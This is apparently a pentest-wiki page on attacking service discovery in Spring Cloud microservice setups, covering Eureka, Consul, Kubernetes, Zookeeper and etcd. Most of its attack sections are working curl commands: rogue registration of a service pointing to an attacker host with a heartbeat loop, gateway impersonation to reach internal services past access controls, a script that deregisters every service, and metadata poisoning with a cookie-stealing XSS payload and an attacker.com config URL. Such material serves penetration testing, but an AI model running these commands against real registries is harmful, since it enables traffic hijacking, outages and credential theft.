Spring Cloud

Attacking Service Discovery in Spring Cloud Architectures

Security Checklist

Components

Service Discovery (Eureka)

Netflix Eureka acts as a service registry where microservices register themselves and discover other services.
By default, Eureka Server runs on port 8761 and provides both a web dashboard and REST API.

Spring Cloud Config Server

Centralized configuration management system that serves configuration to distributed applications. Default port is 8888.

Spring Cloud Gateway

API gateway that provides routing, load balancing, and security features for microservices.

Spring Cloud Function

Enables serverless programming with support for AWS Lambda, Azure Functions, and Google Cloud Functions.

Identifying the Discovery Mechanism

Netflix Eureka

Default port: 8761
Web UI path: http://target:8761/
API endpoints: /eureka/apps, /eureka/apps/{service}
Response headers often include: X-Application-Context
Java-based

HashiCorp Consul

Default ports: 8500 (HTTP), 8600 (DNS), 8300-8302 (Server RPC)
Web UI path: http://target:8500/ui/
API endpoints: /v1/catalog/services, /v1/agent/services
Response headers: X-Consul-* headers
Written in Go

Kubernetes Native

DNS-based service discovery (CoreDNS)
Default ports: 6443 (API server), 10250 (kubelet), 10251 (scheduler), 10252 (controller)
API endpoint: https://target:6443/api/v1
Service DNS format: service-name.namespace.svc.cluster.local
Environment variables in pods: KUBERNETES_SERVICE_HOST, KUBERNETES_SERVICE_PORT

Apache Zookeeper

Default port: 2181 (client connections), 2888 (follower), 3888 (election)
Uses custom protocol
Often used with Kafka, Hadoop ecosystems

etcd

Default ports: 2379 (client), 2380 (peer)
API endpoints: /v2/keys, /v3/kv
Used heavily by Kubernetes for cluster state

Exploiting HashiCorp Consul

Service Enumeration

List all registered services

curl http://target:8500/v1/catalog/services

Get service details

curl http://target:8500/v1/catalog/service/web

List all nodes

curl http://target:8500/v1/catalog/nodes

# Query via DNS

dig @target -p 8600 web.service.consul SRV
dig @target -p 8600 web.service.consul A

ACL Status Check

Check if ACLs are enabled

curl http://target:8500/v1/acl/bootstrap

If ACLs disabled, you'll get services without auth

curl http://target:8500/v1/agent/services

Attacking Service Discovery - Eureka

Finding Eureka Servers

Port scan

nmap -p 8761 target-range

Shodan

eureka port:8761

HTTP probe

curl http://target:8761/

Eureka Dashboard Access: http://target:8761/

API Enumeration

List all applications

curl http://target:8761/eureka/apps

Get specific application

curl http://target:8761/eureka/apps/SERVICE-NAME

Get instance info

curl http://target:8761/eureka/apps/SERVICE-NAME/instance-id

Rogue Service Registration - Eureka

Once you have identify the service, register a malicious one:

curl -X POST http://username:password@target:8761/eureka/apps/TARGET-SERVICE \
  -H "Content-Type: application/json" \
  -d '{
    "instance": {
      "hostName": "attacker-server.com",
      "app": "TARGET-SERVICE",
      "ipAddr": "ATTACKER-IP",
      "port": {
        "$": 8080,
        "@enabled": true
      },
      "securePort": {
        "$": 443,
        "@enabled": false
      },
      "status": "UP",
      "homePageUrl": "http://attacker-server.com:8080/",
      "statusPageUrl": "http://attacker-server.com:8080/actuator/info",
      "healthCheckUrl": "http://attacker-server.com:8080/actuator/health",
      "dataCenterInfo": {
        "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
        "name": "MyOwn"
      }
    }
  }'

Maintain registration by sending heartbeats:

while true; do
  curl -X PUT http://target:8761/eureka/apps/TARGET-SERVICE/instance-id
  sleep 30
done

Service Impersonation via Gateway - Eureka

Find service mapped to root path / in gateway configuration
Identify internal service you want to access (e.g., secretservice)

3. Register new instance of gateway-mapped service pointing to target:

curl -X POST http://username:password@eureka:8761/eureka/apps/WEBSERVICE \
  -H "Content-Type: application/json" \
  -d '{
    "instance": {
      "app": "WEBSERVICE",
      "ipAddr": "INTERNAL-SERVICE-IP",
      "port": {"$": INTERNAL-SERVICE-PORT, "@enabled": true},
      "hostName": "internal-secret-service",
      "status": "UP"
    }
  }'

Gateway will load balance between legitimate and malicious instances
Requests through gateway may hit internal service, bypassing access controls

Service Deregistration Attacks - Eureka

Deregister legitimate service

curl -X DELETE http://username:password@target:8761/eureka/apps/SERVICE-NAME/instance-id

Mass Deregistration:

# Get all services
SERVICES=$(curl http://username:password@target:8761/eureka/apps | grep -oP '(?<=<name>)[^<]+')

# Deregister each
for service in $SERVICES; do
  INSTANCES=$(curl http://target:8761/eureka/apps/$service | grep -oP '(?<=<instanceId>)[^<]+')
  for instance in $INSTANCES; do
    curl -X DELETE http://target:8761/eureka/apps/$service/$instance
  done
done

Metadata Poisoning

Inject malicious metadata into service registrations:

curl -X POST http://username:password@target:8761/eureka/apps/SERVICE \
  -H "Content-Type: application/json" \
  -d '{
    "instance": {
      "app": "SERVICE",
      "metadata": {
        "exploit": "<script>alert(document.cookie)</script>",
        "malicious-config": "http://attacker.com/config"
      }
    }
  }'

If metadata is displayed in dashboards or consumed by services without sanitization, this can lead to XSS or configuration injection.

Spring Cloud GatewaySpring Cloud Gateway

Hacking Netflix Eureka | Backbase Engineeringengineering.backbase.com

PreviousSpring Framework NextSpring Boot

Last updated 1 month ago